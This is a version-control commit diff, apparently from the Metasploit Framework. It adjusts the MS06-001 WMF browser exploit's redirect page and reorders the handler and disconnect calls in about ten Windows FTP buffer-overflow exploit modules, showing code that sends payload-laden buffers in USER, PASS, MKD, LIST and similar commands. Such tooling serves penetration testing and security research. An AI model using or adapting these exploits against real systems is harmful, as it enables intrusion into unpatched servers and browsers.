Fixed handler/disconnect order in FTP, fixes to metafile

git-svn-id: file:///home/svn/incoming/trunk@3348 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb

@@ -65,13 +65,13 @@ class Exploits::Windows::Browser::MS06_001_WMF_SETABORTPROC < Msf::Exploit::Remo
 	def on_request_uri(cli, request)
 	
 	
-		ext = 'emf'
+		ext = 'tiff'
 	
-		if (not request.uri.match(/\.emf$/i))
+		if (not request.uri.match(/\.tiff$/i))
 			html =
-				"<html><meta http-equiv='refresh' content='0;" +
+				"<html><meta http-equiv='refresh' content='0; URL=" +
 				get_resource + '/' + 
-				Rex::Text.rand_text_alphanumeric(rand(256)+16) + 
+				Rex::Text.rand_text_alphanumeric(rand(80)+16) + 
 				".#{ext}'><body>One second please...</body></html>"
 			send_response(cli, html)
 			return

modules/exploits/windows/ftp/3cdaemon_ftp_user.rb

@@ -87,8 +87,8 @@ class Exploits::Windows::Ftp::ThreeCeeDaemonFTPUserOverflow < Msf::Exploit::Remo
 
 		send_cmd( ['USER', buf] , false )
 		
-		disconnect
 		handler
+		disconnect
 	end
 
 end

modules/exploits/windows/ftp/freeftpd_user.rb

@@ -83,9 +83,8 @@ class Exploits::Windows::Ftp::FreeFTPDUserOverflow < Msf::Exploit::Remote
 
 		send_cmd( ['USER', buf] , false)
 
-		disconnect
-
 		handler
+		disconnect
 	end
 
 end

modules/exploits/windows/ftp/globalscapeftp_input.rb

@@ -55,8 +55,8 @@ class Exploits::Windows::Ftp::GlobalScapeInputOverflow < Msf::Exploit::Remote
 		
 		send_cmd( [buf] )
 		
-		disconnect
 		handler
+		disconnect
 	end
 
 end

modules/exploits/windows/ftp/netterm_netftpd_user.rb

@@ -102,9 +102,8 @@ class Exploits::Windows::Ftp::NetTermNetFTPOverflow < Msf::Exploit::Remote
 		send_cmd( ["USER #{buf}"] )
 		send_cmd( ['HELP'] )
 		
-		disconnect
-
 		handler
+		disconnect
 	end
 
 end

modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb

@@ -75,8 +75,8 @@ class Exploits::Windows::Ftp::Oracle9iXDPPassOverflow < Msf::Exploit::Remote
 		send_cmd( ['USER', usr], true )
 		send_cmd( ['PASS', buf], false )
 		
-		disconnect
 		handler
+		disconnect
 	end
 
 end

modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb

@@ -74,8 +74,8 @@ class Exploits::Windows::Ftp::Oracle9iXDBUnlockOverflow < Msf::Exploit::Remote
 
 		send_cmd( ['UNLOCK', '/', buf] , false )
 		
-		disconnect
 		handler
+		disconnect
 	end
 
 end

modules/exploits/windows/ftp/servu_mdtm.rb

@@ -176,8 +176,8 @@ class Exploits::Windows::Ftp::ServUMDTMOverflow < Msf::Exploit::Remote
 
 		send_cmd( [buf], false )
 		
-		disconnect
 		handler
+		disconnect
 	end
 	
 	def double_ff?

modules/exploits/windows/ftp/slimftpd_list_concat.rb

@@ -60,8 +60,8 @@ class Exploits::Windows::Ftp::SlimFTPdListConcatOverflow < Msf::Exploit::Remote
 		send_cmd( ['CWD', '41414141'], true );
 		send_cmd( ['LIST', buf], false )
 		
-		disconnect
 		handler
+		disconnect
 	end
 
 end

modules/exploits/windows/ftp/warftpd_165_user.rb

@@ -74,9 +74,9 @@ class Exploits::Windows::Ftp::WarFtpd165 < Msf::Exploit::Remote
 
 		send_cmd( ['USER', buf] , false )
 
-		disconnect
 
 		handler
+		disconnect
 	end
 
 end

modules/exploits/windows/ftp/wsftp_server_503_mkd.rb

@@ -69,9 +69,9 @@ class Exploits::Windows::Ftp::WSFTPDMKDOverflow < Msf::Exploit::Remote
 		buf[524, payload.encoded.length] = payload.encoded
 		
 		send_cmd( ['MKD', buf], true );
-		
+
+		handler		
 		disconnect
-		handler
 	end
 
 end